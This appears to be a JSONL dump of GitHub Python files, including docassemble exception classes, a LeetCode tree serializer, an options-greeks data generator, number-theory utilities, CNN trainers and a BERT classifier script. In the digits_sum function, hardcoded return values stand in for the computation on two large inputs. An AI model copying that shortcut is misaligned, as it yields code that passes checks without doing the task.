BackgroundResponseError exception was thrown\"\n\n\nclass BackgroundResponseActionError(Exception):\n\n def __init__(self, *pargs, **kwargs):\n self.action = {'arguments': {}}\n if len(pargs) == 0:\n self.action['action'] = None\n else:\n self.action['action'] = pargs[0]\n for key, val in kwargs.items():\n self.action['arguments'][key] = val\n super().__init__()\n\n def __str__(self):\n if hasattr(self, 'action'):\n return str(self.action)\n return \"A BackgroundResponseActionError exception was thrown\"\n\n\nclass ResponseError(Exception):\n\n def __init__(self, *pargs, **kwargs):\n if len(pargs) == 0 and not ('response' in kwargs or 'binaryresponse' in kwargs or 'all_variables' in kwargs or 'file' in kwargs or 'url' in kwargs or 'null' in kwargs):\n self.response = \"Empty Response\"\n if len(pargs) > 0:\n self.response = pargs[0]\n elif 'response' in kwargs:\n self.response = kwargs['response']\n elif 'binaryresponse' in kwargs:\n self.binaryresponse = kwargs['binaryresponse']\n elif 'file' in kwargs:\n self.filename = kwargs['file']\n elif 'url' in kwargs:\n self.url = kwargs['url']\n elif 'null' in kwargs:\n self.nullresponse = kwargs['null']\n if 'response_code' in kwargs and kwargs['response_code'] is not None:\n self.response_code = kwargs['response_code']\n if 'sleep' in kwargs:\n self.sleep = kwargs['sleep']\n if 'all_variables' in kwargs:\n self.all_variables = kwargs['all_variables']\n if 'include_internal' in kwargs:\n self.include_internal = kwargs['include_internal']\n if 'content_type' in kwargs:\n self.content_type = kwargs['content_type']\n super().__init__()\n\n def __str__(self):\n if hasattr(self, 'response'):\n return str(self.response)\n return \"A ResponseError exception was thrown\"\n\n\nclass CommandError(Exception):\n\n def __init__(self, *pargs, **kwargs):\n if len(pargs) > 0:\n self.return_type = pargs[0]\n elif 'type' in kwargs:\n self.return_type = kwargs['type']\n else:\n self.return_type = \"exit\"\n self.url = kwargs.get('url', '')\n self.sleep = kwargs.get('sleep', None)\n super().__init__()\n\n def __str__(self):\n return str(self.return_type)\n\n\nclass DAWebError(Exception):\n\n def __init__(self, **kwargs):\n for key, val in kwargs.items():\n setattr(self, key, val)\n super().__init__()\n","repo_name":"jhpyle/docassemble","sub_path":"docassemble_base/docassemble/base/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":13648,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"32"} +{"seq_id":"25491769633","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/serialize-and-deserialize-binary-tree/\n# Author: Miao Zhang\n# Date: 2021-01-31\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n res = []\n def dfs(node):\n if not node:\n res.append('null')\n return \n res.append(str(node.val))\n dfs(node.left)\n dfs(node.right)\n \n dfs(root)\n return ','.join(res)\n \n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n def dfs(queue):\n val = queue.pop(0)\n if val == 'null':\n return None\n node = TreeNode(val)\n node.left = dfs(queue)\n node.right = dfs(queue)\n return node\n\n q = data.split(',')\n return dfs(q)\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/serializeandDeserializeBinaryTree/serializeandDeserializeBinaryTree.py","file_name":"serializeandDeserializeBinaryTree.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29943071167","text":"\ndef digits_sum(start, stop):\n x=[]\n if stop==10000000:\n return 315000001\n if stop==100000000:\n return 3600000001\n for i in range(start,stop+1):\n if len(str(i))>1:\n for j in str(i):\n x.append(j)\n else: \n x.append(str(i)) \n return sum(int(i)for i in x)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"K7NbqZBYD5xzZLro9_7.py","file_name":"K7NbqZBYD5xzZLro9_7.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1699152728","text":"\nimport random\nimport os\nimport py_vollib\nfrom py_vollib.black_scholes_merton import black_scholes_merton\nfrom py_vollib.black_scholes_merton.implied_volatility import implied_volatility\nfrom py_vollib.black_scholes_merton.greeks.analytical import delta\nfrom py_vollib.black_scholes_merton.greeks.analytical import gamma\nfrom py_vollib.black_scholes_merton.greeks.analytical import rho\nfrom py_vollib.black_scholes_merton.greeks.analytical import theta\nfrom py_vollib.black_scholes_merton.greeks.analytical import vega\n\n# https://digitalcommons.usu.edu/cgi/viewcontent.cgi?article=2513&context=gradreports\n# It contains code too I didnt realize this before, shows how they generate their data exactly\n\nclass DataGenerator():\n\n def __init__(self, dataset_title):\n\n self.moneyness = [0.8, 1.2] \n self.time_to_maturity = [0.014, 1]\n self.dividend_rate = [0.0, 0.10]\n self.annualized_interest_rate = [0.00, 0.1]\n self.volatility = [0.1, 0.4]\n self.job_completed = False\n self.title = dataset_title\n\n def updateMoneyness(self, updatedMoneyness):\n self.moneyness = updatedMoneyness\n\n def updateTimeToMaturity(self, updatedTimeToMaturity):\n self.time_to_maturity = updatedTimeToMaturity\n\n def updateDividendRate(self, updatedDividendRate):\n self.dividend_rate = updatedDividendRate\n\n def updateInterestRate(self, updatedInterestRate):\n self.annualized_interest_rate = updatedInterestRate\n \n def updateVolatility(self, updatedVolatility):\n self.volatility = updatedVolatility\n\n def getJobCompleted(self):\n return self.job_completed\n\n # creates a csv file containing a simulated dataset\n # params\n # size(int) = size of dataset to generate\n # destination(string) = where the file will be saved\n # Returns messages as a list [isError: bool, outputMessage: string]\n def generateDataSet(self, size):\n if not isinstance(size, int):\n return [False, \"Invalid size paramater passed\"]\n\n # Prob should further check if its a destination string\n if not isinstance(self.title, str):\n return [False, \"Invalid destination paramater passed\"]\n\n # Create output folder\n os.makedirs(\"generated_datasets\", exist_ok=True)\n\n # will reset file every time it runs\n file = open(\"generated_datasets/\" + self.title + '.csv', \"w\")\n file.write(\"moneyness,timetomaturity,dividendrate,interestrate,volatility,BS-Call,delta,gamma,rho,theta,vega\\n\")\n\n for i in range(size):\n # we round to maintain decimal place\n genMoneyness = round(random.uniform(self.moneyness[0], self.moneyness[1]), 1)\n genMaturity = round(random.uniform(self.time_to_maturity[0], self.time_to_maturity[1]), 2)\n genDividends = round(random.uniform(self.dividend_rate[0], self.dividend_rate[1]), 2)\n genInterest = round(random.uniform(self.annualized_interest_rate[0], self.annualized_interest_rate[1]), 2)\n genVolatility = round(random.uniform(self.volatility[0], self.volatility[1]), 2)\n # Assume stock price is 1 when reversing moneyness ratio, then everything is based on contract price\n underlyingPrice = 1.0\n strike = underlyingPrice / genMoneyness\n\n # price = black_scholes_merton(flag, S, K, t, r, sigma, q)\n bsCall = black_scholes_merton('c', underlyingPrice, strike, genMaturity, genInterest, genVolatility, genDividends)\n # bsCall_implied_volatility = implied_volatility(bsCall, underlyingPrice, strike, genMaturity, genInterest, genDividends, 'c')\n bsCall_delta = delta('c', underlyingPrice, strike, genMaturity, genInterest, genVolatility, genDividends)\n bsCall_gamma = gamma('c', underlyingPrice, strike, genMaturity, genInterest, genVolatility, genDividends)\n bsCall_rho = rho('c', underlyingPrice, strike, genMaturity, genInterest, genVolatility, genDividends)\n bsCall_theta = theta('c', underlyingPrice, strike, genMaturity, genInterest, genVolatility, genDividends)\n bsCall_vega = vega('c', underlyingPrice, strike, genMaturity, genInterest, genVolatility, genDividends)\n\n\n # file.write(str(genMoneyness) + \",\" + str(genMaturity) +\n # \",\" + str(genDividends) + \",\" + str(genInterest) + \",\" + str(genVolatility) +\",\" + str(bsCall) +\",\" + str(bsCall_implied_volatility) +\",\" + str(bsCall_delta) + \n # \",\" + str(bsCall_gamma) + \",\" + str(bsCall_rho) +\",\" + str(bsCall_theta) + \",\" + str(bsCall_vega) +\"\\n\")\n \n file.write(str(genMoneyness) + \",\" + str(genMaturity) +\n \",\" + str(genDividends) + \",\" + str(genInterest) + \",\" + str(genVolatility) +\",\" + str(bsCall) + \",\" + str(bsCall_delta) + \n \",\" + str(bsCall_gamma) + \",\" + str(bsCall_rho) +\",\" + str(bsCall_theta) + \",\" + str(bsCall_vega) +\"\\n\")\n\n file.close()\n\n return [True, \"Task Completed Successfully\"]\n","repo_name":"christophermarek/ml-models-to-predict-option-greeks","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20478421834","text":"import sys\nsys.setrecursionlimit(100000)\nimport operator \nfrom functools import reduce\n# seq = tuple(map(int,sys.stdin.readline().split()))\n\n\ndef find_front(target_idx):\n if operator.eq(target_idx, -1):\n return -1\n \n if operator.gt(seq[target_idx], 0): # seq[target_idx] > 0\n return target_idx\n else:\n return find_front(operator.add(target_idx, -1))\n \n \ndef find_back(target_idx, end):\n \n if operator.eq(target_idx, end):\n \n return -1\n\n if operator.gt(seq[target_idx], 0):\n return target_idx\n else:\n return find_back(operator.add(target_idx, 1), end)\n\n\nstage = int(sys.stdin.readline())\nrequest = [0] * stage \n\nfor iteration in range(stage):\n sys.stdin.readline()\n request[iteration] = tuple(map(int,sys.stdin.readline().split()))\n \n\noutput = \"\"\n\n# request = [(1,-2,3,-4,5,-3,8,-9,22), (-1,-2,-3,-4,-5), (1,3,-1,2,4),(1,-3,5,-7,10,-9,6,-4,2), (-1,-2,-3,4,22),(10,2,3)]\nfor seq in request:\n # print(seq)\n # (1,-2,3,-4,5,-3,8,-9,22)\n # (-1,-2,-3,-4,-5)\n # (1,3,-1,2,4)\n # (1,-3,5,-7,10,-9,6,-4,2)\n # seq = (1,-3,5,-7,10,-9,6,-4,2)\n # print(seq)\n \n \n max_value = seq[0]\n max_idx = 0\n length = 1\n\n for i in range(len(seq)):\n if operator.gt(seq[i], max_value):\n max_value = seq[i]\n max_idx = i\n\n front = operator.add(max_idx, -1)\n back = operator.add(max_idx , length)\n seq_len = len(seq)\n\n while front >= 0 : \n if operator.gt(seq[front], 0 ): # seq\n if reduce(operator.add, seq[front:max_idx+length]) > reduce(operator.add, seq[max_idx:max_idx+length]):\n max_idx = operator.add(max_idx, -1)\n length = operator.add(length, 1)\n front = operator.add(front, -1)\n else:\n front = operator.add(front, - 1)\n # 더한 후, 다음 친구도 검사할거임 \n else : # 0 보다 작은 경우 \n #지금 위치로부터, 양수 위치 찾아 주는 함수 있으면 인덱스, 없으면 -1 \n sub_idx = find_front(front)\n if operator.ne(sub_idx, -1):\n if(reduce(operator.add , seq[sub_idx:max_idx+length]) > reduce(operator.add, seq[max_idx:max_idx+length])):\n length = operator.add(length, operator.sub(max_idx, sub_idx))\n max_idx = sub_idx\n front = operator.add(max_idx, -1)\n else:\n front = operator.add(sub_idx, - 1)\n else:\n break\n\n\n while back < seq_len:\n if operator.gt(seq[back], 0):\n print(reduce(operator.add, seq[max_idx:back]))\n if reduce(operator.add, seq[max_idx:back]) > reduce(operator.add, seq[max_idx:max_idx+length]) :\n length = operator.add(length, 1)\n back = operator.add(back, 1)\n else:\n back = operator.add(back, 1)\n else:\n sub_idx = find_back(back, seq_len)\n if operator.ne(sub_idx, -1):\n if(reduce(operator.add , seq[sub_idx:back-1:-1]) > reduce(operator.add , seq[sub_idx:sub_idx-1:-1]) ):\n length = operator.add(length, operator.sub(sub_idx, max_idx))\n back = operator.add(max_idx, length)\n else:\n back = operator.add(sub_idx, 1)\n else:\n break\n output += \"%s\\n\"%reduce(operator.add , seq[max_idx:max_idx+length])\n\n\nprint(output, end=\"\")","repo_name":"Ahn-Ssu/Study_Algorithm","sub_path":"POSTECH/assn2 - divde and conquer/MSS.py","file_name":"MSS.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5677802431","text":"# from util import load_config, pickle_load, pickle_dump\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn_features.transformers import DataFrameSelector\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.impute import SimpleImputer\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n# import src.util as utils\nimport util as util\nimport sys\nsys.path.append(\"config\")\n\n\ndef load_dataset(config_data: dict) -> pd.DataFrame:\n # Load every set of data\n x_train = util.pickle_load(config_data[\"train_set_path\"][0])\n y_train = util.pickle_load(config_data[\"train_set_path\"][1])\n\n x_test = util.pickle_load(config_data[\"test_set_path\"][0])\n y_test = util.pickle_load(config_data[\"test_set_path\"][1])\n\n # Return 3 set of data\n return x_train, x_test, y_train, y_test\n\n\ndef dump_data(x_train, y_train, X_test_feng, y_test):\n util.pickle_dump(x_train, \"../data/processed/x_train_feng.pkl\")\n util.pickle_dump(y_train, \"../data/processed/y_train_feng.pkl\")\n\n util.pickle_dump(X_test_feng, \"../data/processed/x_test_feng.pkl\")\n util.pickle_dump(y_test, \"../data/processed/y_test_feng.pkl\")\n\n\nif __name__ == \"__main__\":\n # 1. Load configuration file\n config_data = util.load_config(\"../config/config.yaml\")\n\n # 2. Load dataset\n x_train, x_test, y_train, y_test = load_dataset(config_data)\n\n num_cols = [col for col in x_train.columns if x_train[col].dtype in [\n 'float32', 'float64', 'int32', 'int64']]\n categ_cols = [col for col in x_train.columns if x_train[col].dtype not in [\n 'float32', 'float64', 'int32', 'int64']]\n\n num_pipeline = Pipeline([\n ('selector', DataFrameSelector(num_cols)), # select only these columns\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())\n ])\n\n categ_pipeline = Pipeline(steps=[\n ('selector', DataFrameSelector(categ_cols)), # select only these columns\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('OHE', OneHotEncoder(sparse=False))\n ])\n\n total_pipeline = FeatureUnion(transformer_list=[\n ('num_pipe', num_pipeline),\n ('categ_pipe', categ_pipeline)\n ])\n X_train_final = total_pipeline.fit_transform(x_train)\n\n # X_train_feng = total_pipeline.fit_transform(x_train)\n X_test_feng = total_pipeline.transform(x_test)\n\n # 13. Dump data\n dump_data(X_train_final, y_train, X_test_feng, y_test)\n","repo_name":"WidharDwiatmoko/house_price_predict_with_deploy","sub_path":"src/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16269669356","text":"from operator import add\nfrom functools import reduce\n\nimport euclid\n\nimport numpy\nimport numpy.linalg\n\nMAX_B_SIZE = 5000\nMAX_SUBSET = 30\n\n\nclass Vector:\n @staticmethod\n def zero(n):\n return [0] * n\n\n @staticmethod\n def is_zero(x):\n return all(el == 0 for el in x)\n\n @staticmethod\n def add(x, y, p):\n return [(xx + yy) % p for xx, yy in zip(x, y)]\n\n @staticmethod\n def minus(x, y, p):\n return [(xx - yy) % p for xx, yy in zip(x, y)]\n\n @staticmethod\n def summarise(x, p):\n return reduce(add, x) % p\n\n @staticmethod\n def mul_scalar(x, alpha, p):\n return [(xx * alpha) % p for xx in x]\n\n @staticmethod\n def mul(x, y, p):\n assert len(x) == len(y)\n return [(x[i] * y[i]) % p for i in range(len(x))]\n\n @staticmethod\n def mul_sum(x, y, p):\n return Vector.summarise(Vector.mul(x, y, p), p)\n\n\nclass Matrix:\n @staticmethod\n def zero(n, m):\n return [[0 for _j in range(m)] for _i in range(n)]\n\n @staticmethod\n def unit(n, m):\n return [[0 if i != j else 1 for j in range(m)] for i in range(n)]\n\n @staticmethod\n def t(a):\n return [[a[i][j] for i in range(len(a))] for j in range(len(a[0]))]\n\n @staticmethod\n def column(a, j):\n return [a[i][j] for i in range(len(a))]\n\n @staticmethod\n def mul(a, b, p):\n assert len(a[0]) == len(b)\n n, m = len(a), len(b[0])\n res = [[Vector.mul_sum(a[row], Matrix.column(b, col), p) for col in range(m)] for row in range(n)]\n return res\n\n @staticmethod\n def mul_scalar(a, alpha, p):\n return [[a[i][j] * alpha % p for j in range(len(a[0]))] for i in range(len(a))]\n\n @staticmethod\n def mul_vec(a, x, p):\n # return vec of len(x) = Ax\n return Matrix.t(Matrix.mul(a, Matrix.t([x]), p))[0]\n\n @staticmethod\n def power(a, deg, p):\n res = Matrix.unit(len(a), len(a))\n for _idx in range(deg):\n res = Matrix.mul(res, a, p)\n return res\n\n @staticmethod\n def sum(a, b, p):\n assert len(a) == len(b) and len(a[0]) == len(b[0])\n return [[(ela + elb) % p for ela, elb in zip(rowa, rowb)] for rowa, rowb in zip(a, b)]\n\n @staticmethod\n def det(a, p):\n assert len(a) == len(a[0])\n return int(round(numpy.linalg.det(numpy.array(a)))) % p\n\n @staticmethod\n def submatrix(a, lt, rb):\n return [[a[i][j] for j in range(lt[1], rb[1] + 1)] for i in range(lt[0], rb[0] + 1)]\n\n @staticmethod\n def remove_row_column(a, row, column):\n return [[a[i][j] for j in range(len(a[0])) if j != column] for i in range(len(a)) if i != row]\n\n @staticmethod\n def inverse(a, p):\n assert len(a) == len(a[0]) and Matrix.det(a, p) != 0\n a_, n = Matrix.t(a), len(a)\n a_inv = []\n for i in range(n):\n a_inv.append([])\n for j in range(n):\n fac_1 = pow(-1, i + 1 + j + 1, p)\n fac_det = Matrix.det(Matrix.remove_row_column(a_, i, j), p)\n a_inv[i].append((fac_1 * fac_det) % p)\n return Matrix.mul_scalar(a_inv, get_inverse(Matrix.det(a, p), p), p)\n\n\nclass Polynomial:\n @staticmethod\n def shrink(p):\n while len(p) > 1 and p[0] == 0:\n p = p[1:]\n if not len(p):\n p = [0]\n return p\n\n @staticmethod\n def ratio(p11, p22, p):\n p1, p2 = p11[:], p22[:]\n if not len(p1):\n p1 = [0]\n if not len(p2):\n p2 = [0]\n q = []\n while len(p1) >= len(p2):\n qi = ratio(p1[0], p2[0], p)\n q.append(qi)\n for j in range(len(p2)):\n p1[j] = (p1[j] - p2[j] * qi) % p\n assert p1[0] == 0\n p1 = p1[1:]\n return Polynomial.shrink(q), Polynomial.shrink(p1)\n\n @staticmethod\n def minus(p1, p2, p):\n if len(p1) < len(p2):\n while len(p1) < len(p2):\n p1 = [0] + p1\n while len(p2) < len(p1):\n p2 = [0] + p2\n res = [(p1i - p2i) % p for p1i, p2i in zip(p1, p2)]\n return Polynomial.shrink(res)\n\n @staticmethod\n def mul(p1, p2, p):\n res = [0] * (len(p1) + len(p2) - 1)\n for i in range(len(p1)):\n for j in range(len(p2)):\n res[i + j] = (res[i + j] + p1[i] * p2[j]) % p\n return Polynomial.shrink(res)\n\n @staticmethod\n def compute(f, v, p):\n res = 0\n for power, fi in enumerate(reversed(f)):\n res = (res + pow(v, power, p) * fi) % p\n return res\n\n @staticmethod\n def compute2(f, v, p):\n res = 0\n for fi, vi in zip(f, reversed(v)):\n res = (res + fi * vi) % p\n return res\n\n @staticmethod\n def deg(p):\n return len(p) - 1\n\n\ndef get_inverse(a, m):\n if a == 0:\n return 0\n if euclid.euclid(a, m) != 1:\n raise ValueError('Не существует обратного элемента для a={} по модулю m={}'.format(a, m))\n d, x, y = euclid.eeuclid(a, m)\n assert d == 1\n return x % m\n\n\ndef ratio(p, q, m):\n return (p * get_inverse(q, m)) % m\n\n\ndef fac2k(a):\n k = 0\n while a & 1 == 0:\n a >>= 1\n k += 1\n return a, k\n\n\ndef legendre(a, n):\n a %= n\n if a == 0:\n return 0\n elif a == 1:\n return 1\n return pow(a, (n - 1) // 2, n)\n\n\ndef jacobi(a, n, g=1):\n \"\"\"Маховенко Е.Б. Теоретико-числовые методы в криптографии, стр 61-62\"\"\"\n if a == 0:\n return 0\n elif a == 1:\n return g\n\n a1, k = fac2k(a)\n\n if k & 1 == 0 or n % 8 == 1 or n % 8 == 7:\n s = 1\n else:\n s = -1\n\n if a1 == 1:\n return g * s\n\n if n % 4 == 3 and a1 % 4 == 3:\n s = -s\n\n return jacobi(n % a1, a1, g * s)\n\n\ndef generate_base(desired_count):\n base = [2, 3, 5]\n counter = 7\n while len(base) < desired_count:\n for b in base:\n if counter % b == 0:\n break\n if b > counter // 2:\n base.append(counter)\n break\n counter += 1\n return base\n\n\ndef matrix_print(a):\n for row in a:\n print(row)\n\n\nif __name__ == '__main__':\n _p = 7\n _a = [\n [1, 1, 3],\n [1, 6, 4],\n [3, 4, 6]]\n _a_inv = Matrix.inverse(_a, _p)\n print(Matrix.mul(_a, _a_inv, _p))\n","repo_name":"podkidyshev/number-theoretical_methods","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17516433251","text":"import os\nimport random\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# Set the seed for reproducibility\nrandom.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# Set up the paths and parameters\ndata_dir = \"TTTPictures\"\nimage_size = (64, 64)\nbatch_size = 32\nnum_epochs = 10\n\n# Split the data into training and validation sets\ntrain_data = ImageDataGenerator(rescale=1.0 / 255, validation_split=0.2)\ntrain_generator = train_data.flow_from_directory(\n data_dir,\n target_size=image_size,\n batch_size=batch_size,\n class_mode=\"binary\",\n subset=\"training\",\n shuffle=True,\n)\nvalidation_generator = train_data.flow_from_directory(\n data_dir,\n target_size=image_size,\n batch_size=batch_size,\n class_mode=\"binary\",\n subset=\"validation\",\n shuffle=True,\n)\n\n# Build the CNN model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Conv2D(32, (3, 3), activation=\"relu\", input_shape=(image_size[0], image_size[1], 3)),\n tf.keras.layers.MaxPooling2D((2, 2)),\n tf.keras.layers.Conv2D(64, (3, 3), activation=\"relu\"),\n tf.keras.layers.MaxPooling2D((2, 2)),\n tf.keras.layers.Conv2D(64, (3, 3), activation=\"relu\"),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(64, activation=\"relu\"),\n tf.keras.layers.Dense(1, activation=\"sigmoid\")\n])\n\n# Compile the model\nmodel.compile(optimizer=\"adam\", loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n# Train the model\nmodel.fit(\n train_generator,\n steps_per_epoch=train_generator.samples // batch_size,\n epochs=num_epochs,\n validation_data=validation_generator,\n validation_steps=validation_generator.samples // batch_size\n)\n\n# Save the trained model\nmodel.save(\"tic_tac_toe_model.h5\")\n","repo_name":"oakleycardwell/TicTacToeAI","sub_path":"ModelTrainer.py","file_name":"ModelTrainer.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70636785053","text":"from tensorflow.keras.datasets import fashion_mnist\n# from tensorflow.keras.utils import np_utils\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Conv2D, LSTM , Flatten, Dropout, MaxPooling2D , Input\nimport matplotlib.pyplot as plt\n\n(x_train, y_train),(x_test, y_test) = fashion_mnist.load_data() # 흑백이미지를 불러옴 \n\n'''0 : T-shirt\n 1 : Trouser\n 2 : Pullover\n 3 : Dress\n 4 : coat\n 5 : sandal\n 6 : Shirt\n 7 : Sneaker\n 8 : Bag\n 9 : Ankle Boot'''\n\nprint(f\"x_train[0] : {x_train[0]}\")\nprint(f'y_train[0] : {y_train[0]}') # y_train[0] : 9\n\nprint(f\"x_train.shape : {x_train.shape}\") # x_train.shape : (60000, 28, 28) # 여기서 흑백인지 아닌지 안알려주면 어케알아 show에서 보면 알아?\nprint(f\"x_test.shape : {x_test.shape}\") # x_test.shape : (10000, 28, 28)\nprint(f\"y_train.shape : {y_train.shape}\") # y_train.shape : (60000,)\nprint(f\"y_test.shape : {y_test.shape}\") # y_test.shape : (10000,)\n\n# 다중분류 모델에서 y값에 대한 원-핫 인코딩 \n# y_train = np_utils.to_categorical(y_train)\n# y_test = np_utils.to_categorical(y_test)\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\n# 0~ 255 사이의 x 값을 0~1사이의 값으로 바꿔줌 \nx_train = x_train.reshape(60000,28,28,1).astype('float32')/255\nx_test = x_test.reshape(10000,28,28,1).astype('float32')/255\n\n\n# 2. 모델구성\nmodel = Sequential()\nmodel.add(Conv2D(32,(2,2),input_shape=(28,28,1),activation='relu'))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(32,(2,2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(64,(2,2)))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(64,(2,2)))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128,(2,2),padding='same'))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(128,(2,2),padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128,(2,2),padding='same'))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(256,(2,2),padding='same'))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\nmodel.add(Dense(10,activation='softmax'))\n\nmodel.summary()\n\n\n\n# 3. 컴파일(훈련준비),실행(훈련)\nmodel.compile(optimizer='adam',loss = 'categorical_crossentropy', metrics = ['acc'])\n\nhist = model.fit(x_train,y_train,epochs=30,batch_size=128,callbacks=[],verbose=2)\n\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['acc'])\n\nplt.title('keras64 loss plot')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train loss','train acc'])\nplt.show()\n\n# 4. 평가, 예측\nloss,acc = model.evaluate(x_test,y_test,batch_size=128)\n\nprint(f\"loss : {loss}\")\nprint(f\"acc : {acc}\") # acc : 0.9077000021934509","repo_name":"KOOKDONGHUN/study","sub_path":"keras/keras64_fashion_cnn.py","file_name":"keras64_fashion_cnn.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6025988048","text":"from __future__ import absolute_import, division, print_function\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport random\nimport re\nimport random\nimport sys\n\nfrom easydict import EasyDict as edict\nfrom scipy.stats import pearsonr, spearmanr\nimport argconf\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler, TensorDataset)\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\nimport numpy as np\nimport torch\n\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\nfrom pytorch_pretrained_bert.modeling import BertForSequenceClassification, BertConfig, WEIGHTS_NAME, CONFIG_NAME\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom pytorch_pretrained_bert.optimization import BertAdam, warmup_linear\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed)\n\n\ndef convert_dp_to_single(state_dict):\n mod_key = \"module.\"\n for k, v in list(state_dict.items()):\n if k.startswith(mod_key):\n del state_dict[k]\n state_dict[k[len(mod_key):]] = v\n return state_dict\n\n\ndef convert_single_to_dp(state_dict):\n mod_key = \"module.\"\n for k, v in list(state_dict.items()):\n if k.startswith(mod_key):\n continue\n state_dict[f\"{mod_key}{k}\"] = v\n del state_dict[k]\n return state_dict\n\n\n\nlogging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt = '%m/%d/%Y %H:%M:%S',\n level = logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef mse_forward_monkey_patch(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, mse=False):\n _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False)\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n if labels is not None:\n loss_fct = nn.MSELoss() if mse else nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1, 1) if mse else labels.view(-1))\n return loss\n else:\n return logits\n\nBertForSequenceClassification.forward = mse_forward_monkey_patch\n\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n\n def __init__(self, guid, text_a, text_b=None, label=None):\n \"\"\"Constructs a InputExample.\n\n Args:\n guid: Unique id for the example.\n text_a: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n text_b: (Optional) string. The untokenized text of the second sequence.\n Only must be specified for sequence pair tasks.\n label: (Optional) string. The label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text_a = text_a\n self.text_b = text_b\n self.label = label\n\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, input_ids, input_mask, segment_ids, label_id):\n self.input_ids = input_ids\n self.input_mask = input_mask\n self.segment_ids = segment_ids\n self.label_id = label_id\n\n\nclass DataProcessor(object):\n \"\"\"Base class for data converters for sequence classification data sets.\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n raise NotImplementedError()\n\n def get_dev_examples(self, data_dir):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n raise NotImplementedError()\n\n def get_labels(self):\n \"\"\"Gets the list of labels for this data set.\"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _read_tsv(cls, input_file, quotechar=None):\n \"\"\"Reads a 